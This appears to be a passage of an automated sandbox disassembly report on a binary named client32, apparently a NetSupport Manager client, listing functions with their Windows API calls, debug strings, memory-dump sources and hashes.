                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                              • String ID: vector<T> too long
                                                                              • API String ID: 1785806476-3788999226
                                                                              • Opcode ID: 2b11b4a62976d03dbe1a2d60c57ba794ffa8eb3dd1e129956f34f93b7f7fd68e
                                                                              • Instruction ID: d358ddf0df870076cc5f93b669e2da6c265d75c8f3dc5f3c9d6febbcbc9ac7f9
                                                                              • Opcode Fuzzy Hash: 2b11b4a62976d03dbe1a2d60c57ba794ffa8eb3dd1e129956f34f93b7f7fd68e
                                                                              • Instruction Fuzzy Hash: B601B5B1A002059FC724CEADDC90CA7B7EDEFD43187148A2EE45A87644DA71F904C750
                                                                              Function 110D1540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                              • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                              • API String ID: 175691280-2052047905
                                                                              • Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                              • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                              • Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                              • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                              Function 11015030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                              • m_hWnd, xrefs: 11015049
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              • Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                              • Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
                                                                              • Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                              • Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94
                                                                              Function 11014390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ImageList_Create.COMCTL32(?,?,?,?,?), ref: 110143BE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateErrorExitImageLastList_MessageProcesswsprintf
                                                                              • String ID: ..\ctl32\imagelst.cpp$m_hImageList
                                                                              • API String ID: 756090014-1731862680
                                                                              • Opcode ID: 07d921ffa2181537d20c18b6818c9ba3a9d0b657febdfe7dc916a1ba0a5e0468
                                                                              • Instruction ID: ed28c1bf2740c29e09f0e670a8a7b9fc6316d817cb7ee806623638b648209f33
                                                                              • Opcode Fuzzy Hash: 07d921ffa2181537d20c18b6818c9ba3a9d0b657febdfe7dc916a1ba0a5e0468
                                                                              • Instruction Fuzzy Hash: 50F062B1600719AFC320CF59D805A97B7E8EF98310B00852DF99AC3600D370E8508FA0
                                                                              Function 11026220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,WTSQuerySessionInformationA), ref: 11026234
                                                                              • SetLastError.KERNEL32(00000078), ref: 11026261
                                                                              Strings
                                                                              • WTSQuerySessionInformationA, xrefs: 1102622E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: WTSQuerySessionInformationA
                                                                              • API String ID: 199729137-4033149579
                                                                              • Opcode ID: baa88468955957b6059d11983daf5332bd6c471d9e11bd6bf7137641dae478ff
                                                                              • Instruction ID: 4c0ad6fd8419ebffd4c55594285f5a8fd2d3e56036ab3e38740d805351100f5e
                                                                              • Opcode Fuzzy Hash: baa88468955957b6059d11983daf5332bd6c471d9e11bd6bf7137641dae478ff
                                                                              • Instruction Fuzzy Hash: 8FF03A72A4062CAFD714DFA4D844E97B7E9FB48721F00861AF95997600D770E8108BA0
                                                                              Function 11026270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 1102628C
                                                                              • SetLastError.KERNEL32(00000078), ref: 110262AB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: WTSFreeMemory
                                                                              • API String ID: 199729137-4124798068
                                                                              • Opcode ID: 530a1f113437d382cc4561dc9a8be7801c5ccfef9d809f7e8a4bd4cc1eb91108
                                                                              • Instruction ID: e97d27ce3b7ab54eb7811836018b8a0661f8d3204aa561733cbd10bce3554200
                                                                              • Opcode Fuzzy Hash: 530a1f113437d382cc4561dc9a8be7801c5ccfef9d809f7e8a4bd4cc1eb91108
                                                                              • Instruction Fuzzy Hash: 76F0EC72B427159FF7208F99E984745F7FCEF44722F10046AE951D3600C77468488BA0
                                                                              Function 1115F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetPropA.USER32(?,?,?), ref: 1115F395
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                              • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                              • API String ID: 1134434899-3115850912
                                                                              • Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                              • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                              • Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                              • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                              Function 110151E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                              • m_hWnd, xrefs: 110151F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              • Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                              • Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
                                                                              • Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                              • Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5
                                                                              Function 110173D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                              • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: QueueUserWorkItem
                                                                              • API String ID: 199729137-2469634949
                                                                              • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                              • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                              • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                              • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                              Function 1109C040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 1109C06E
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                              • String ID: ..\ctl32\INFLATE.C$nbytes <= ID->e_outsize
                                                                              • API String ID: 1528188558-3285258354
                                                                              • Opcode ID: ecb1d2fd84a0efc869cb3fd50d03752f88223f91c469aac01704c3705c6b2e37
                                                                              • Instruction ID: 7f0224e6c9458007a7afc97dbdd4e0f72ed2e2df69d52e9d6a6733ff5f9c70a0
                                                                              • Opcode Fuzzy Hash: ecb1d2fd84a0efc869cb3fd50d03752f88223f91c469aac01704c3705c6b2e37
                                                                              • Instruction Fuzzy Hash: E9F03476E00B409BC260CA2AEA91A4BF7E9BFC0B18B41891DE08B96E51D270F840CB00
                                                                              Function 110AA110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,SetupDiDestroyDeviceInfoList), ref: 110AA124
                                                                              • SetLastError.KERNEL32(00000078,00000000,?,110AA38E,?), ref: 110AA141
                                                                              Strings
                                                                              • SetupDiDestroyDeviceInfoList, xrefs: 110AA11E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: SetupDiDestroyDeviceInfoList
                                                                              • API String ID: 199729137-2336592288
                                                                              • Opcode ID: 9f428bef2085436ff31b2eac782211992ffef28bf1cf74844d0bf96a815d6146
                                                                              • Instruction ID: 61a65b45d089cfb4d2408545eebc62cc3d57d9e53018ea31370ae8da83e1cc67
                                                                              • Opcode Fuzzy Hash: 9f428bef2085436ff31b2eac782211992ffef28bf1cf74844d0bf96a815d6146
                                                                              • Instruction Fuzzy Hash: E1E01272A41728ABD724DFE4E904B87FBD89B14B61F01843AE66997940DA71E840CB90
                                                                              Function 1101D320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                              • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
